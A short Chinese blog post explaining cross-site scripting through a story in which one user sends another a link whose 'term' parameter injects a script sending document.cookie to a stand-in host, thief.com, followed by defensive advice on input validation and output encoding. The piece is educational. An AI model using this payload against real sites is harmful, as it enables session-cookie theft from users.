XSS攻击一例
XSS全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的Cookie,导航到恶意网站,携带木马等。
下面一个例子演示怎样进行XSS攻击:
Tom发现"Victim.com"网站有个XSS漏洞,而Jerry是"Victim.com"的用户,有一天他收到了QQ上的消息,让他点击下面的连接:
http://victim.com/signon.do?term=<script>window.open("http://thief.com?cookie="+document.cookie)</script>
Jerry认为"Victim.com"他经常访问,所以毫不犹豫的点击了连接,后果是Jerry在"Victim.com"的所有cookie信息被Tom窃取。
攻击的过程是三个步骤:
step1.诱骗受害人点击钓鱼连接,或者访问钓鱼网站。
step2.XSS漏洞网站的server端没有对clientinput做校验,也没有对output做过滤和转码。
step3.返回的jsp里面有漏洞参数,上例是"term",当返回到client端后,问题脚本就被执行了。
所以防范XSS攻击也很简单:
A.对于用户来说,千万小心钓鱼连接和钓鱼网站。
B.对于我们的网站来说,在server端一定要对input做校验,对output转码!
相关推荐
today0 2020-05-04
sswqycbailong 2020-07-28
csxiaoqiang 2020-07-26
码农成长记 2020-07-19
layloge 2020-07-05
layloge 2020-06-26
liangjielaoshi 2020-06-25
csxiaoqiang 2020-06-16
某先生 2020-06-13
ItBJLan 2020-06-11
layloge 2020-06-07
csxiaoqiang 2020-06-03
sswqycbailong 2020-06-01
layloge 2020-05-30
码农成长记 2020-05-28
qidu 2020-05-26
zhuangnet 2020-05-20
zhuangnet 2020-05-19
xiaoemo0 2020-05-16